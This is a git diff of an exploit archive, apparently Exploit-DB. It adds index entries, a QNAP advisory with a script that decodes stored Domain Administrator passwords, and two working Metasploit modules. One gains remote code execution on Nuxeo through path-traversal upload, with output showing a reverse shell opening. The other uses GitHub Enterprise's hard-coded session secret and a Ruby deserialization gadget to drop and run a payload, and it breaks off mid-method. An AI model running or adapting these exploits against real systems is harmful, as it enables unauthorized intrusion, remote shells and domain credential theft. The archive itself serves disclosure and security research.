diff --git a/files.csv b/files.csv
index 85b240f5b..88591ad97 100644
--- a/files.csv
+++ b/files.csv
@@ -4513,7 +4513,7 @@ id,file,description,date,author,platform,type,port
 36662,platforms/windows/dos/36662.txt,"Edraw Diagram Component 5 - ActiveX Control 'LicenseName()' Method Buffer Overflow",2012-02-06,"Senator of Pirates",windows,dos,0
 36669,platforms/linux/dos/36669.txt,"Apache APR - Hash Collision Denial of Service",2012-01-05,"Moritz Muehlenhoff",linux,dos,0
 36682,platforms/php/dos/36682.php,"PHP PDORow Object - Remote Denial of Service",2011-09-24,anonymous,php,dos,0
-36741,platforms/lin_x86/dos/36741.py,"Samba < 3.6.2 (x86) - Denial of Serviec (PoC)",2015-04-13,sleepya,lin_x86,dos,0
+36741,platforms/lin_x86/dos/36741.py,"Samba < 3.6.2 (x86) - Denial of Service (PoC)",2015-04-13,sleepya,lin_x86,dos,0
 36743,platforms/linux/dos/36743.c,"Linux Kernel 3.13 / 3.14 (Ubuntu) - 'splice()' System Call Local Denial of Service",2015-04-13,"Emeric Nasi",linux,dos,0
 36773,platforms/windows/dos/36773.c,"Microsoft Windows - 'HTTP.sys' PoC (MS15-034)",2015-04-15,rhcp011235,windows,dos,0
 36776,platforms/windows/dos/36776.py,"Microsoft Windows - 'HTTP.sys' HTTP Request Parsing Denial of Service (MS15-034)",2015-04-16,"laurent gaffie",windows,dos,80
@@ -5425,6 +5425,11 @@ id,file,description,date,author,platform,type,port
 41669,platforms/multiple/dos/41669.txt,"APNGDis 2.8 - 'image width / height chunk' Heap Buffer Overflow",2017-03-14,"Alwin Peppels",multiple,dos,0
 41670,platforms/multiple/dos/41670.txt,"APNGDis 2.8 - 'filename' Stack Buffer Overflow",2017-03-14,"Alwin Peppels",multiple,dos,0
 41715,platforms/linux/dos/41715.txt,"wifirxpower - Local Buffer Overflow",2017-03-23,"Nassim Asrir",linux,dos,0
+41734,platforms/windows/dos/41734.c,"Microsoft Visual Studio 2015 update 3 - Denial of Service",2017-03-26,"Peter Baris",windows,dos,0
+41737,platforms/windows/dos/41737.txt,"Disk Sorter Enterprise 9.5.12 - Local Buffer Overflow",2017-03-27,"Nassim Asrir",windows,dos,0
+41741,platforms/multiple/dos/41741.html,"Apple Safari - 'DateTimeFormat.format' Type Confusion",2017-03-27,"Google Security Research",multiple,dos,0
+41742,platforms/multiple/dos/41742.html,"Apple Safari - Builtin JavaScript Allows Function.caller to be Used in Strict Mode",2017-03-27,"Google Security Research",multiple,dos,0
+41743,platforms/multiple/dos/41743.html,"Apple Safari - Out-of-Bounds Read when Calling Bound Function",2017-03-27,"Google Security Research",multiple,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -8887,6 +8892,7 @@ id,file,description,date,author,platform,type,port
 41713,platforms/windows/local/41713.rb,"MOXA Device Manager Tool 2.1 - Buffer Overflow (Metasploit)",2010-10-20,Metasploit,windows,local,0
 41721,platforms/windows/local/41721.c,"Forticlient 5.2.3 Windows 10 x64 (Pre Anniversary) - Privilege Escalation",2017-03-25,sickness,windows,local,0
 41722,platforms/windows/local/41722.c,"Forticlient 5.2.3 Windows 10 x64 (Post Anniversary) - Privilege Escalation",2017-03-25,sickness,windows,local,0
+41745,platforms/hardware/local/41745.txt,"QNAP QTS < 4.2.4 - Domain Privilege Escalation",2017-03-27,"Pasquale Fiorillo",hardware,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -15390,6 +15396,9 @@ id,file,description,date,author,platform,type,port
 41718,platforms/hardware/remote/41718.txt,"Miele Professional PG 8528 - Directory Traversal",2017-03-24,"Jens Regel",hardware,remote,0
 41719,platforms/hardware/remote/41719.rb,"NETGEAR WNR2000v5 - (Un)authenticated hidden_lang_avi Stack Overflow (Metasploit)",2017-03-24,Metasploit,hardware,remote,80
 41720,platforms/python/remote/41720.rb,"Logsign 4.4.2 / 4.4.137 - Remote Command Injection (Metasploit)",2017-03-24,Metasploit,python,remote,0
+41738,platforms/windows/remote/41738.py,"Internet Information Services (IIS) 6.0 WebDAV - 'ScStoragePathFromUrl' Buffer Overflow",2017-03-27,"Zhiniang Peng and Chen Wu",windows,remote,0
+41740,platforms/multiple/remote/41740.txt,"Samba 4.5.2 - Symlink Race Permits Opening Files Outside Share Directory",2017-03-27,"Google Security Research",multiple,remote,0
+41744,platforms/linux/remote/41744.rb,"Github Enterprise - Default Session Secret And Deserialization (Metasploit)",2017-03-27,Metasploit,linux,remote,8443
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -37261,7 +37270,7 @@ id,file,description,date,author,platform,type,port
 41137,platforms/php/webapps/41137.txt,"Music Site Script 1.2 - Authentication Bypass",2017-01-20,"Ihsan Sencan",php,webapps,0
 41138,platforms/php/webapps/41138.txt,"Affiliate Tracking Script 1.1 - Authentication Bypass",2017-01-20,"Ihsan Sencan",php,webapps,0
 41139,platforms/php/webapps/41139.txt,"Mini CMS 1.1 - Authentication Bypass",2017-01-20,"Ihsan Sencan",php,webapps,0
-41140,platforms/php/webapps/41140.txt,"B2B Alibaba Clone Script - SQL Injection",2017-01-20,"Ihsan Sencan",php,webapps,0
+41140,platforms/php/webapps/41140.txt,"B2B Alibaba Clone Script - 'IndustryID' Parameter SQL Injection",2017-01-20,"Ihsan Sencan",php,webapps,0
 41141,platforms/linux/webapps/41141.txt,"NTOPNG 2.4 Web Interface - Cross-Site Request Forgery",2017-01-22,hyp3rlinx,linux,webapps,0
 41143,platforms/php/webapps/41143.rb,"PageKit 1.0.10 - Password Reset",2017-01-21,"Saurabh Banawar",php,webapps,0
 41147,platforms/hardware/webapps/41147.txt,"WD My Cloud Mirror 2.11.153 - Authentication Bypass / Remote Code Execution",2017-01-24,"Kacper Szurek",hardware,webapps,0
@@ -37630,3 +37639,19 @@ id,file,description,date,author,platform,type,port
 41714,platforms/windows/webapps/41714.rb,"Distinct TFTP 3.10 - Writable Directory Traversal Execution (Metasploit)",2012-04-08,Metasploit,windows,webapps,0
 41716,platforms/php/webapps/41716.txt,"Gr8 Tutorial Script - SQL Injection",2017-03-24,"Ihsan Sencan",php,webapps,0
 41717,platforms/php/webapps/41717.txt,"Gr8 Gallery Script - SQL Injection",2017-03-24,"Ihsan Sencan",php,webapps,0
+41724,platforms/php/webapps/41724.txt,"Just Another Video Script 1.4.3 - SQL Injection",2017-03-26,"Ihsan Sencan",php,webapps,0
+41725,platforms/php/webapps/41725.txt,"Adult Tube Video Script - SQL Injection",2017-03-25,"Ihsan Sencan",php,webapps,0
+41726,platforms/php/webapps/41726.txt,"Alibaba Clone Script - SQL Injection",2017-03-26,"Ihsan Sencan",php,webapps,0
+41727,platforms/php/webapps/41727.txt,"B2B Marketplace Script 2.0 - SQL Injection",2017-03-26,"Ihsan Sencan",php,webapps,0
+41728,platforms/php/webapps/41728.txt,"Php Real Estate Property Script - SQL Injection",2017-03-26,"Ihsan Sencan",php,webapps,0
+41729,platforms/php/webapps/41729.txt,"Courier Tracking Software 6.0 - SQL Injection",2017-03-26,"Ihsan Sencan",php,webapps,0
+41730,platforms/php/webapps/41730.txt,"Parcel Delivery Booking Script 1.0 - SQL Injection",2017-03-26,"Ihsan Sencan",php,webapps,0
+41731,platforms/php/webapps/41731.txt,"Delux Same Day Delivery Script 1.0 - SQL Injection",2017-03-26,"Ihsan Sencan",php,webapps,0
+41732,platforms/php/webapps/41732.txt,"Hotel Booking Script 1.0 - SQL Injection",2017-03-26,"Ihsan Sencan",php,webapps,0
+41733,platforms/php/webapps/41733.txt,"Tour Package Booking 1.0 - SQL Injection",2017-03-26,"Ihsan Sencan",php,webapps,0
+41735,platforms/php/webapps/41735.txt,"Professional Bus Booking Script - 'hid_Busid' Parameter SQL Injection",2017-03-27,"Ihsan Sencan",php,webapps,0
+41736,platforms/php/webapps/41736.txt,"CouponPHP CMS 3.1 - 'code' Parameter SQL Injection",2017-03-27,"Ihsan Sencan",php,webapps,0
+41746,platforms/php/webapps/41746.txt,"EyesOfNetwork (EON) 5.0 - Remote Code Execution",2017-03-27,Sysdream,php,webapps,0
+41747,platforms/php/webapps/41747.txt,"EyesOfNetwork (EON) 5.0 - SQL Injection",2017-03-27,Sysdream,php,webapps,0
+41748,platforms/jsp/webapps/41748.rb,"Nuxeo 6.0 / 7.1 / 7.2 / 7.3 - Remote Code Execution (Metasploit)",2017-03-27,Sysdream,jsp,webapps,0
+41749,platforms/php/webapps/41749.txt,"inoERP 0.6.1 - Cross-Site Scripting / Cross-Site Request Forgery / SQL Injection / Session Fixation",2017-03-27,"Tim Herres",php,webapps,0
diff --git a/platforms/hardware/local/41745.txt b/platforms/hardware/local/41745.txt
new file mode 100755
index 000000000..3afb67238
--- /dev/null
+++ b/platforms/hardware/local/41745.txt
@@ -0,0 +1,215 @@
+QNAP QTS Domain Privilege Escalation Vulnerability
+
+ Name              Sensitive Data Exposure in QNAP QTS
+ Systems Affected  QNAP QTS (NAS) all model and all versions < 4.2.4
+ Severity          High 7.9/10
+ Impact            CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L
+ Vendor            http://www.qnap.com/
+ Advisory          http://www.ush.it/team/ush/hack-qnap/qnap.txt
+ Authors           Pasquale "sid" Fiorillo (sid AT ush DOT it) 
+                   Guido "go" Oricchio (g.oricchio AT pcego DOT com)
+ Date              20170322
+
+I. BACKGROUND
+
+QNAP Systems, founded in 2004, provides network attached storage (NAS)
+and network video recorder (NVR) solutions for home and business use to
+the global market.
+QNAP also delivers a cloud service, called myQNAPcloud, that allows
+users to access and manage the devices from anywhere.
+QTS is a QNAP devices proprietary firmware based on Linux.
+
+ISGroup (http://www.isgroup.biz/) is an Italian Information Security 
+boutique, we found this 0day issue while supporting Guido Oricchio 
+of PCego, a System Integrator, to secure a QNAP product for one of his
+customer.
+
+Responsible disclosure with Qnap: we contacted qnap on public security@
+contact and we escalate fast to their Security Researcher Myron Su on
+PGP emails.
+
+Prior vulnerabilities in QNAP: 
+https://www.qnap.com/en/support/con_show.php?op=showone&cid=41
+
+Information to customers of the vulnerability is shown in their bulletin
+ID NAS-201703-21 (https://www.qnap.com/en/support/con_show.php?cid=113):
+QTS 4.2.4 Build 20170313 includes security fixes for the following
+vulnerabilities: Configuration file vulnerability (CVE-2017-5227)
+reported by Pasquale Fiorillo of the cyber security company ISGroup
+(www.isgroup.biz), a cyber security company, and Guido Oricchio of
+PCego (www.pcego.com), a system integrator.
+
+The latest version of the software at the time of writing can be 
+obtained from:
+
+https://www.qnap.com/en-us/product_x_down/
+https://start.qnap.com/en/index.php
+https://www.qnap.com/
+
+II. DESCRIPTION
+
+The vulnerability allows a local QTS admin user, or other low privileged
+user, to access configuration file that includes a bad crypted Microsoft
+Domain Administrator password if the NAS was joined to a Microsoft 
+Active Directory domain.
+
+The affected component is the "uLinux.conf" configuration file, 
+created with a world-readable permission used to store a Domain 
+Administrator password.
+
+Admin user can access the file using ssh that is enabled by default.
+Other users are not allowed to login, so they have to exploit a 
+component, such as a web application, to run arbitrary command or 
+arbitrary file read.
+
+TLDR: Anyone is able to read uLinux.conf file, world readable by 
+default, can escalate to Domain Administrator if a NAS is a domain 
+member.
+
+III. ANALYSIS
+
+QNAP QTS stores "uLinux.conf" configuration file in a directory 
+accessible by "nobody" and with permission that make them readable by 
+"nobody".
+
+If the NAS was joined to an Active Directory, such file contain a Domain
+Administrator user and password in an easily decrypt format.
+
+In older versions of QTS the Domain Admin's password was stored in
+plaintext.
+
+A) Config file readable by "nobody"
+
+  [~] # ls -l /etc/config/uLinux.conf 
+  -rw-r--r--    1 admin    administ      7312 Dec 10 06:39 /etc/config/uLinux.conf
+
+  Our evidence is for QTS 4.2.0 and QTS 4.2.2 running on a TS-451U, 
+  TS-469L, and TS-221. Access to the needed file are guaranteed to 
+  all the local users, such as httpdusr used to running web sites and 
+  web application hosted on the NAS.
+
+  This expose all the information contained in the configuration file at
+  risk and this is a violation of the principle of least privilege.
+
+  https://en.wikipedia.org/wiki/Principle_of_least_privilege
+
+B) Weak encrypted password in the configuration file
+
+  The Microsoft Active Directory Admin username and password are stored 
+  in the file obfuscated by a simple XOR cypher and base64 encoded.
+
+  In this scenario, a Local File Read vulnerability could lead to full
+  domain compromise given the fact that an attacker can re-use such
+  credentials to authenticate against a Domain Controller with maximum
+  privileges.
+
+  The password field in the uLinux.conf has the following format:
+
+  User = <username>
+  Password = <base64>
+
+  eg: 
+  User = Administrator
+  Password = AwMAAAEBBgYHBwQEIyMgICEhJiYnJyQkQw==
+
+  The "<base64>" decoded is:
+
+  sid@zen:~$echo -n "AwMAAAEBBgYHBwQEIyMgICEhJiYnJyQkQw==" | base64 -d | hexdump -C
+  00000000  03 03 00 00 01 01 06 06  07 07 04 04 23 23 20 20  |............##  |
+  00000010  21 21 26 26 27 27 24 24  43                       |!!&&''$$C|
+  00000019
+
+  Each byte xored with \x62 is the hex ascii code of the plaintext char.
+  Eg: 
+    \x03 ^ \x62 = \x61 (a)
+    \x00 ^ \x62 = \x61 (b)
+    ...
+    \x24 ^ \x62 = \x46 (F)
+    \x43 ^ \x62 = \x21 (!)
+    
+  The plaintext password is: aabbccddeeffAABBCCDDEEFF!
+
+IV. EXPLOIT
+
+The following code can be used to decode the password:
+
+#!/usr/bin/php
+<?php
+$plaintext = str_split(base64_decode($argv[1]));
+foreach($plaintext as $chr) {
+	echo chr(ord($chr)^0x62);
+}
+echo "\n";
+
+Eg: sid@zen:~$ ./decode.php AwMAAAEBBgYHBwQEIyMgICEhJiYnJyQkQw==
+aabbccddeeffAABBCCDDEEFF!
+
+V. VENDOR RESPONSE
+Vendor released QTS 4.2.4 Build 20170313 that contains the proper
+security patch. At the time of this writing an official patch is
+currently available.
+
+VI. CVE INFORMATION
+
+Mitre assigned the CVE-2017-5227 for this vulnerability, internally to
+Qnap it's referred as Case NAS-201703-21.
+
+VII. DISCLOSURE TIMELINE
+
+20161212 Bug discovered
+20170106 Request for CVE to Mitre
+20170106 Disclosure to security@qnap.com
+20170107 Escalation to Myron Su, Security Researcher from QNAP (fast!)
+20170107 Details disclosure to Myron Su
+20170109 Got CVE-CVE-2017-5227 from cve-assign
+20170110 Myron Su confirm the vulnerability
+20170203 We asks for updates, no release date from vendor
+20170215 We extend the disclosure date as 28 Feb will not be met
+20170321 QNAP releases the QTS 4.2.4 Build 20170313
+20170322 Advisory disclosed to the public
+
+VIII. REFERENCES
+
+[1] Top 10 2013-A6-Sensitive Data Exposure
+    https://www.owasp.org/index.php/Top_10_2013-A6-Sensitive_Data_Exposure
+
+[2] Access Control Cheat Sheet
+    https://www.owasp.org/index.php/Access_Control_Cheat_Sheet
+
+[3] https://forum.qnap.com/viewtopic.php?t=68317
+    20121213 User reporting that the password was stored in plaintext in
+    a world-readable file
+    
+[4] https://www.qnap.com/en/support/con_show.php?cid=113
+    Qnap Security Bullettin NAS-201703-21 
+
+IX. CREDIT
+
+Pasquale "sid" Fiorillo and Guido "go" Oricchio are credited with the 
+discovery of this vulnerability.
+
+Pasquale "sid" Fiorillo
+web site: http://www.pasqualefiorillo.it/
+mail: sid AT ush DOT it
+
+Guido "go" Oricchio
+web site: http://www.pcego.com/
+mail: g.oricchio AT pcego DOT com
+
+X. LEGAL NOTICES
+
+Copyright (c) 2017 Pasquale "sid" Fiorillo
+
+Permission is granted for the redistribution of this alert
+electronically. It may not be edited in any way without mine express
+written consent. If you wish to reprint the whole or any
+part of this alert in any other medium other than electronically,
+please email me for permission.
+
+Disclaimer: The information in the advisory is believed to be accurate
+at the time of publishing based on currently available information. Use
+of the information constitutes acceptance for use in an AS IS condition.
+There are no warranties with regard to this information. Neither the
+author nor the publisher accepts any liability for any direct, indirect,
+or consequential loss or damage arising from use of, or reliance on,
+this information.
diff --git a/platforms/jsp/webapps/41748.rb b/platforms/jsp/webapps/41748.rb
new file mode 100755
index 000000000..607e38754
--- /dev/null
+++ b/platforms/jsp/webapps/41748.rb
@@ -0,0 +1,216 @@
+=begin
+# Description
+
+Nuxeo Platform is a content management system for enterprises (CMS).
+It embeds an Apache Tomcat server, and can be managed through a web
+interface.
+
+One of its features allows authenticated users to import files to the
+platform.
+By crafting the upload request with a specific ``X-File-Name`` header,
+one can successfuly upload a file at an arbitrary location of the server
+file system.
+
+It is then possible to upload a JSP script to the root directory of the
+web application to execute commands on the remote host operating system.
+Setting the value ``../../nxserver/nuxeo.war/shell.jsp`` to the
+``X-File-Name`` header is a way to do so.
+
+## Details
+
+**CVE ID**: CVE-2017-5869
+
+**Access Vector**: network
+
+**Security Risk**: high
+
+**Vulnerability**: CWE-434
+
+**CVSS Base Score**: 8.8
+
+**CVSS Vector**: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+
+# Proof of Concept
+
+Here is a metasploit module to exploit this vulnerability:
+
+=end
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+    Rank = ExcellentRanking
+
+    include Msf::Exploit::Remote::HttpClient
+
+    def initialize(info={})
+        super(update_info(info,
+            'Name'              => "Nuxeo Platform File Upload RCE",
+            'Description'       => %q{
+                The Nuxeo Platform tool is vulnerable to an authenticated remote code execution,
+                thanks to an upload module.
+            },
+            'License'           => MSF_LICENSE,
+            'Author'            => ['Ronan Kervella <r.kervella@sysdream.com>'],
+            'References'        =>
+                [
+                    ['https://nuxeo.com/', '']
+                ],
+            'Platform'          => %w{linux},
+            'Targets'           => [ ['Nuxeo Platform 6.0 to 7.3', 'Platform' => 'linux'] ],
+            'Arch'              => ARCH_JAVA,
+            'Privileged'        => true,
+            'Payload'           => {},
+            'DisclosureDate'    => "",
+            'DefaultTarget'     => 0))
+        register_options(
+            [
+                OptString.new('TARGETURI', [true, 'The path to the nuxeo application', '/nuxeo']),
+                OptString.new('USERNAME', [true, 'A valid username', '']),
+                OptString.new('PASSWORD', [true, 'Password linked to the username', ''])
+            ], self.class)
+    end
+
+    def jsp_filename
+        @jsp_filename ||= Rex::Text::rand_text_alpha(8) + '.jsp'
+    end
+
+    def jsp_path
+        'nxserver/nuxeo.war/' + jsp_filename
+    end
+
+    def nuxeo_login
+        res = send_request_cgi(
+            'method' => 'GET',
+            'uri'    => normalize_uri(target_uri.path, '/login.jsp')
+        )
+
+        fail_with(Failure::Unreachable, 'No response received from the target.') unless res
+        session_cookie = res.get_cookies
+
+        res = send_request_cgi(
+            'method'    => 'POST',
+            'uri'       => normalize_uri(target_uri.path, '/nxstartup.faces'),
+            'cookie'    => session_cookie,
+            'vars_post' => {
+                'user_name'     => datastore['USERNAME'],
+                'user_password' => datastore['PASSWORD'],
+                'submit'        => 'Connexion'
+            }
+        )
+        return session_cookie if res && res.code == 302 && res.redirection.to_s.include?('view_home.faces')
+        nil
+    end
+
+    def trigger_shell
+        res = send_request_cgi(
+            'method'    => 'GET',
+            'uri'       => normalize_uri(target_uri.path, jsp_filename)
+        )
+        fail_with(Failure::Unknown, 'Unable to get #{full_uri}/#{jsp_filename}') unless res && res.code == 200
+    end
+
+    def exploit
+        print_status("Authenticating using #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
+        session_cookie = nuxeo_login
+        if session_cookie
+            payload_url = normalize_uri(target_uri.path, jsp_filename)
+            res = send_request_cgi(
+                'method'    => 'POST',
+                'uri'       => normalize_uri(target_uri.path, '/site/automation/batch/upload'),
+                'cookie'    => session_cookie,
+                'headers'    => {
+                    'X-File-Name'   => '../../' + jsp_path,
+                    'X-Batch-Id'    => '00',
+                    'X-File-Size'   => '1024',
+                    'X-File-Type'   => '',
+                    'X-File-Idx'    => '0',
+                    'X-Requested-With'  => 'XMLHttpRequest'
+                },
+                'ctype'             => '',
+                'data' => payload.encoded
+            )
+            fail_with(Failure::Unknown, 'Unable to upload the payload') unless res && res.code == 200
+            print_status("Executing the payload at #{normalize_uri(target_uri.path, payload_url)}.")
+            trigger_shell
+        else
+            fail_with(Failure::Unknown, 'Unable to login')
+        end
+    end
+
+end
+
+=begin
+Module output:
+
+```bash
+msf> use exploit/multi/http/nuxeo
+msf exploit(nuxeo) > set USERNAME user1
+USERNAME => user1
+msf exploit(nuxeo) > set PASSWORD password
+PASSWORD => password
+msf exploit(nuxeo) > set rhost 192.168.253.132
+rhost => 192.168.253.132
+msf exploit(nuxeo) > set payload java/jsp_shell_reverse_tcp
+payload => java/jsp_shell_reverse_tcp
+msf exploit(nuxeo) > set lhost 192.168.253.1
+lhost => 192.168.253.1
+msf exploit(nuxeo) > exploit
+
+[-] Handler failed to bind to 192.168.253.1:4444:-  -
+[*] Started reverse TCP handler on 0.0.0.0:4444
+[*] Authenticating using user1:password
+[*] Executing the payload at /nuxeo/nuxeo/QBCefwxQ.jsp.
+[*] Command shell session 1 opened (172.17.0.2:4444 ->
+192.168.253.132:43279) at 2017-01-13 14:47:25 +0000
+
+id
+uid=1000(nuxeo) gid=1000(nuxeo)
+groups=1000(nuxeo),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin),110(sambashare)
+pwd
+/var/lib/nuxeo/server
+```
+
+# Vulnerable code
+
+The vulnerable code is located in the
+`org.nuxeo.ecm.restapi.server.jaxrs.BatchUploadObject` class ([github
+link](https://github.com/nuxeo/nuxeo/blob/b05dde789a6c0c7b5f361608eb6d6bd0fda31f36/nuxeo-features/rest-api/nuxeo-rest-api-server/src/main/java/org/nuxeo/ecm/restapi/server/jaxrs/BatchUploadObject.java#L150)),
+where the header ``X-File-Name`` is not checked.
+
+# Fix
+
+Nuxeo provided a
+[patch](https://github.com/nuxeo/nuxeo/commit/6b3113977ef6c2307f940849a2c196621ebf1892)
+for this issue.
+A hotfix release is also available for Nuxeo 6.0 (Nuxeo 6.0 HF35).
+
+Please note that vulnerability does not affect Nuxeo versions above 7.3.
+
+# Affected versions
+
+* Nuxeo 6.0 (LTS 2014), released 2014-11-06
+* Nuxeo 7.1 (Fast Track, obsoleted by Nuxeo 7.10), released 2015-01-15
+* Nuxeo 7.2 (Fast Track, obsoleted by Nuxeo 7.10), released 2015-03-24
+* Nuxeo 7.3 (Fast Track, obsoleted by Nuxeo 7.10), released 2015-06-24
+
+# Unaffected versions
+
+* Nuxeo 6.0 HF35, released 2017-01-12
+* Nuxeo 7.4 (Fast Track, obsoleted by Nuxeo 7.10), released 2015-10-02
+* Nuxeo 7.10 (LTS 2015), released 2015-11-09
+* Nuxeo 8.10 (LTS 2016), released 2016-12-06
+
+# Credits
+
+Ronan Kervella <r.kervella@sysdream.com>
+
+-- SYSDREAM Labs <labs@sysdream.com> 
+GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1 
+* Website: https://sysdream.com/ 
+* Twitter: @sysdream 
+=end
\ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/41723.c b/platforms/lin_x86/shellcode/41723.c
index e04a4a220..21c3a957a 100755
--- a/platforms/lin_x86/shellcode/41723.c
+++ b/platforms/lin_x86/shellcode/41723.c
@@ -2,7 +2,6 @@
 ; File name: reversebash.nasm
 ; Author:  Jasmin Landry (@JR0ch17)
 ; Purpose: Shellcode that creates a reverse /bin/bash shell on port 54321 to IP address 192.168.3.119
-; To change
 ; Shellcode length: 110 bytes
 ; Tested on Ubuntu 12.04.5 32-bit (x86)
 ; Assemble reversebash.nasm file: nasm -f elf32 -o reversebash.o reversebash.nasm -g
diff --git a/platforms/linux/remote/41744.rb b/platforms/linux/remote/41744.rb
new file mode 100755
index 000000000..e2dd903ff
--- /dev/null
+++ b/platforms/linux/remote/41744.rb
@@ -0,0 +1,195 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Github Enterprise Default Session Secret And Deserialization Vulnerability",
+      'Description'    => %q{
+        This module exploits two security issues in Github Enterprise, version 2.8.0 - 2.8.6.
+        The first is that the session management uses a hard-coded secret value, which can be
+        abused to sign a serialized malicious Ruby object. The second problem is due to the
+        use of unsafe deserialization, which allows the malicious Ruby object to be loaded,
+        and results in arbitrary remote code execution.
+
+        This exploit was tested against version 2.8.0.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'iblue <iblue[at]exablue.de>', # Original discovery, writeup, and PoC (he did it all!)
+          'sinn3r'                       # Porting the PoC to Metasploit
+        ],
+      'References'     =>
+        [
+          [ 'EDB', '41616' ],
+          [ 'URL', 'http://exablue.de/blog/2017-03-15-github-enterprise-remote-code-execution.html' ],
+          [ 'URL', 'https://enterprise.github.com/releases/2.8.7/notes' ] # Patched in this version
+        ],
+      'Platform'       => 'linux',
+      'Targets'        =>
+        [
+          [ 'Github Enterprise 2.8', { } ]
+        ],
+      'DefaultOptions' =>
+        {
+          'SSL'   => true,
+          'RPORT' => 8443
+        },
+      'Privileged'     => false,
+      'DisclosureDate' => 'Mar 15 2017',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The base path for Github Enterprise', '/'])
+      ], self.class)
+  end
+
+  def secret
+    '641dd6454584ddabfed6342cc66281fb'
+  end
+
+  def check
+    uri = normalize_uri(target_uri.path, 'setup', 'unlock')
+    res = send_request_cgi!({
+      'method' => 'GET',
+      'uri'    => uri,
+      'vars_get' =>{
+        'redirect_to' => '/'
+      }
+    })
+
+    unless res
+      vprint_error('Connection timed out.')
+      return Exploit::CheckCode::Unknown
+    end
+
+    unless res.get_cookies.match(/^_gh_manage/)
+      vprint_error('No _gh_manage value in cookie found')
+      return Exploit::CheckCode::Safe
+    end
+
+    cookies = res.get_cookies
+    vprint_status("Found cookie value: #{cookies}, checking to see if it can be tampered...")
+    gh_manage_value = CGI.unescape(cookies.scan(/_gh_manage=(.+)/).flatten.first)
+    data = gh_manage_value.split('--').first
+    hmac = gh_manage_value.split('--').last.split(';', 2).first
+    vprint_status("Data: #{data.gsub(/\n/, '')}")
+    vprint_status("Extracted HMAC: #{hmac}")
+    expected_hmac = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, secret, data)
+    vprint_status("Expected HMAC: #{expected_hmac}")
+
+    if expected_hmac == hmac
+      vprint_status("The HMACs match, which means you can sign and tamper the cookie.")
+      return Exploit::CheckCode::Vulnerable
+    end
+
+    Exploit::CheckCode::Safe
+  end
+
+  def get_ruby_code
+    b64_fname = "/tmp/#{Rex::Text.rand_text_alpha(6)}.bin"
+    bin_fname = "/tmp/#{Rex::Text.rand_text_alpha(5)}.bin"
+    register_file_for_cleanup(b64_fname, bin_fname)
+    p = Rex::Text.encode_base64(generate_payload_exe)
+
+    c  = "File.open('#{b64_fname}', 'wb') { |f| f.write('#{p}') }; "
+    c << "%x(base64 --decode #{b64_fname} > #{bin_fname}); "
+    c << "%x(chmod +x #{bin_fname}); "
+    c << "%x(#{bin_fname})"
+    c
+  end
+
+
+  def serialize
+    # We don't want to run this code within the context of Framework, so we run it as an
+    # external process.
+    # Brilliant trick from Brent and Adam to overcome the issue.
+    ruby_code = %Q|
+    module Erubis;class Eruby;end;end
+    module ActiveSupport;module Deprecation;class DeprecatedInstanceVariableProxy;end;end;end
+
+    erubis = Erubis::Eruby.allocate
+    erubis.instance_variable_set :@src, \\"#{get_ruby_code}; 1\\"
+    proxy = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.allocate
+    proxy.instance_variable_set :@instance, erubis
+    proxy.instance_variable_set :@method, :result
+    proxy.instance_variable_set :@var, "@result"
+
+    session =
+    {
+      'session_id' => '',
+      'exploit'    => proxy
+    }
+
+    print Marshal.dump(session)
+    |
+
+    serialized_output = `ruby -e "#{ruby_code}"`
+
+    serialized_object = [serialized_output].pack('m')
+    hmac = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, secret, serialized_object)
+
+    return serialized_object, hmac
+  end
+
+  def send_serialized_data(dump, hmac)
+    uri = normalize_uri(target_uri.path)
+    gh_manage_value = CGI.escape("#{dump}--#{hmac}")
+    cookie = "_gh_manage=#{gh_manage_value}"
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri'    => uri,
+      'cookie' => cookie
+    })
+
+    if res
+      print_status("Server returned: #{res.code}")
+    end
+  end
+
+  def exploit
+    dump, hmac = serialize
+    print_status('Serialized Ruby stager')
+
